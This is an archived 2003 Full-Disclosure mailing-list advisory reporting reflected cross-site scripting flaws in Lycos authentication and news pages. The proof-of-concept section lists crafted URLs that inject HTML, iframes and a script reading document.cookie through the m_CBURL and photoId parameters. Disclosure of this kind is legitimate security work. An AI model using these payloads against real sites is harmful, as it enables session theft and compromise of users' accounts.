[Full-Disclosure] Lycos Authenticating Systems and Lycos News server Vulnerabilities

From: Lorenzo Hernandez Garcia-Hierro (novappc_at_novappc.com)
Date: 06/14/03

Next message: Lorenzo Hernandez Garcia-Hierro: "[Full-Disclosure] Ok KF, i tell you about the buffer overflow in Sphera"

Previous message: xlopkov_at_eml.cc: "Re: [Full-Disclosure] send me the Sphera Corp email contact , please"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: <full-disclosure@lists.netsys.com>
Date: Sat, 14 Jun 2003 16:48:05 +0200

---------------
Systems affected: Lycos authenticating servers ,Login forms, Lycos News Site
Risk: 7
Type of errors: Input Validation Flaw
---------------
I encountered security holes in the Lycos Authentication servers . These
servers are affected by multiple Cross Site Scripting
attacks .The hole is in the form that the login cgi program makes the final
lofin form , injecting a final tag like "> in the m_CBURL
variable you can inject html and script in the login form. In addition i
encountered security holes in the Lycos News server related to XSS attacks.
-------------
EXPLOITS / PROOFS OF CONCEPT
-------------
http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL=">[HERE COMES YOUR XSS
ATTACK CODE]

http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417">
[XSS ATTACK CODE]

------------
SAMPLES
------------
http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417">
<H1>xss in Lycos WebSites</h1>
http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417">
<script>alert(document.cookie);</script>
http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417">
<iframe></iframe>
http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL="><h1>XSS in Lycos
Authenticating Servers</h1><a href="
http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL="><script>alert(document.
cookie);</script>

------------------------------------------------------
Lorenzo Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
--Nova Projects Professional Coding--
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************
www.novappc.com
security.novappc.com
www.lorenzohgh.com
______________________

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Next message: Lorenzo Hernandez Garcia-Hierro: "[Full-Disclosure] Ok KF, i tell you about the buffer overflow in Sphera"

Previous message: xlopkov_at_eml.cc: "Re: [Full-Disclosure] send me the Sphera Corp email contact , please"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]